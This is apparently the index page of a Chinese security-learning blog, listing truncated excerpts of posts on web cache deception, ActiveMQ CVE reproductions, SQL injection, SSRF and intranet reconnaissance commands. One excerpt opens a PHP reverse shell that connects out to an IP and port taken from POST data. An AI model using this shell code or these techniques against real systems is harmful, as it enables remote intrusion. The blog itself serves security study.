会员
众包
新闻
博问
闪存
赞助商
HarmonyOS
Chat2DB
所有博客
当前博客
我的博客
我的园子
账号设置
会员中心
简洁模式
...
退出登录
注册
登录
Ca1m的Blog
安全学习的点点滴滴
博客园
首页
新随笔
联系
订阅
管理
2023年2月28日
Web 缓存欺骗总结
摘要: Web 缓存欺骗总结 Web 缓存欺骗 (WCD) 是一种攻击,在这种攻击中,攻击者欺骗缓存代理,使其不正确地存储通过 Internet 发送的私人信息并获得对该缓存数据的未授权访问。它是由安全研究员 Omer Gil 在 2017 年提出的。 Web 缓存欺骗攻击是如何工作的? 当浏览器向网站发出
阅读全文
posted @ 2023-02-28 10:07 Ca1m
阅读(351)
评论(0)
推荐(0)
2023年2月22日
Kali虚拟机安装reNgine 失败解决办法
摘要: Kali虚拟机安装reNgine 1. VPS安装需要修改 1. /reNgine/web/Dockerfile 点击查看代码 # Download and install go 1.19 RUN wget https://go.dev/dl/go1.19.5.linux-amd64.tar.gz
阅读全文
posted @ 2023-02-22 09:17 Ca1m
阅读(105)
评论(0)
推荐(0)
2021年6月7日
Github网站打不开的问题
摘要: 一、确定ip进入网址https://github.com.ipaddress.com查看GitHub的ip地址。140.82.112.3 github.com二、确定域名ip进入网址https://fastly.net.ipaddress.com/github.global.ssl.fastly.n
阅读全文
posted @ 2021-06-07 13:34 Ca1m
阅读(279)
评论(0)
推荐(0)
2021年4月16日
ActiveMQ 任意文件写入漏洞复现 (CVE-2016-3088)
摘要: 环境搭建 搭建及运行漏洞环境: docker-compose build docker-compose up -d 环境监听61616端口和8161端口,其中8161为web控制台端口,本漏洞就出现在web控制台中。 访问http://your-ip:8161/看到web页面,说明环境已成功运行。
阅读全文
posted @ 2021-04-16 16:28 Ca1m
阅读(148)
评论(0)
推荐(0)
ActiveMQ反序列化(CVE-2015-5254)(漏洞复现)
摘要: ActiveMQ反序列化(CVE-2015-5254) Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务、集群、Spring Framework等。 Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏
阅读全文
posted @ 2021-04-16 14:14 Ca1m
阅读(133)
评论(0)
推荐(0)
2020年11月26日
内网信息收集命令速查
摘要: 一 收集本机信息 1.1 手动收集信息 查询网络配置信息 ipconfig /all ifconfig 查询操作系统及软件的信息 查询操作系统和版本信息 systeminfo | findstr /B /C:"OS Name" /C:"OS Version"systeminfo | findstr
阅读全文
posted @ 2020-11-26 10:37 Ca1m
阅读(671)
评论(0)
推荐(0)
2020年11月23日
SQL注入漏洞--盲注和宽字节注入
摘要: 盲注是注入的一种,指的是在不知道数据库返回值的情况下对数据中的内容进行猜测,实施SQL注入。盲注一般分为布尔盲注和基于时间的盲注和报错的盲注。 1.布尔盲注 布尔很明显Ture跟Fales,也就是说它只会根据你的注入信息返回Ture跟Fales,也就没有了之前的报错信息。2.时间盲注 界面返回值只有
阅读全文
posted @ 2020-11-23 15:42 Ca1m
阅读(590)
评论(0)
推荐(0)
2020年11月22日
PHP反弹shell
摘要: <?php set_time_limit(0); $ip=$_POST['ip']; $port=$_POST['port']; $fp=@fsockopen($ip,$port,$errno,$errstr); if(!$fp){echo "error";} else{ fputs($fp,"\n
阅读全文
posted @ 2020-11-22 20:39 Ca1m
阅读(1463)
评论(0)
推荐(0)
2020年11月20日
SQL注入漏洞--报错注入
摘要: 报错注入 报错注入在没法用union联合查询时用,但前提还是不能过滤一些关键的函数。 报错注入就是利用了数据库的某些机制,人为地制造错误条件,使得查询结果能够出现在错误信息中。 具体原理请参考:https://www.cnblogs.com/richardlee97/p/10617115.html
阅读全文
posted @ 2020-11-20 14:33 Ca1m
阅读(428)
评论(0)
推荐(0)
跨站请求伪造(SSRF)
摘要: SSRF漏洞简介 SSRF(服务端请求伪造)是一种利用漏洞未在服务端发起请求。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。 漏洞原理 通过控制功能中的发起请求的服务来当作跳板攻击内网中其他服务。比如,通过控制前台的请求远程地址加载的响应,来让请求数据由远程的URL域名修改为请求本地、或
阅读全文
posted @ 2020-11-20 10:41 Ca1m
阅读(511)
评论(0)
推荐(0)
下一页
公告